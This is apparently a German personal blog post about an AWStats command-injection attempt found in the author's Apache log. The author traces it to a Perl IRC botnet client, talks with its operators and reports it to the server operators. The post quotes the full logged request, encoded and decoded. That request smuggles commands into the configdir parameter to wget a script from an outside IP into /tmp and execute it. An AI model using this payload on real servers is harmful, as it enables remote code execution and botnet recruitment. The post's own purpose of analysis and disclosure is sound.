Mit einem kleinen Eintrag in der access.log meines Apachen fing alles an.
GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp
%3bwget%20211%2e234%2e113%2e241%2fscripz
%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
In ASCII dekodiert ergibt sie folgendes:
GET /awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo|
Irgendjemand versuchte da eine der zahlreichen AWStats Sicherheitslücken auszunutzen und irgendwas auf anfälligen Server auszuführen.
Da es Sonntag ist und ich sowieso nichts weiter vorhatte, guckt man sich die Datei “211.234.113.241/scripz” mal an.
Es ist ein kleines Bash-Skript, das 2 weitere Dateien zieht.
219.84.105.36.42/ping und 219.84.105.36.42/httpd.
Ping ist ein binary. Und da meine Code-Audit-Fähigkeiten bei Binaries komplett aufhören lassen wir es mal außer acht :D
httpd hingegen ist ein kleiner IRC-Client in Perl, der dafür sorgt das sich alle infizierten Clients in Undernet in einem Channel sammeln und sich mit einem “Hallo, hier bin ich.” melden.
In eben jenen Channel bin ich dann auch mal spontan gegangen und hatte eine nettes sinnloses Gespräch mit einem der 3 Betreiber des Botnets.
Zitat:
<xxx> the botnet is just something for fun :)
<xxx> nothing else
[...]
<xxx> i run the bots with the uid that the apache servere is started
<xxx> nothing more
[...]
[We are scanning...]
<xxx> mambo awstats and xmlrpc
<xxx> and other php bugs :P
<xxx> try to patch your server…
Tjojo.. Schon spannend so ein Ausflug in die Welt der krassen Hacker.
Und wie schön, das mein Apache noch nichtmal PHP geschweige den Perl kennt.
– Die Serverbetreiber sind informiert und ich hoffe sie lesen die Mail auch.
Update:
Der Serveroperator hat die Mail gelesen und sich ganz nett für den Tipp bedankt.
Laut seiner Aussage verfolgt er diese “Malware” schon seit Monaten, aber diesmal sei es das erste mal, das sich ein Channel der Malware im Undernet befindet.
Die Betreiber der infizierten Maschinen werden informiert und sie versuchen zu verhindern, das die Botnet-Betreiber nochmal das Undernet missbrauchen. (Was aber wohl sehr schwer werden dürfte..)
Soebend bin ich über 
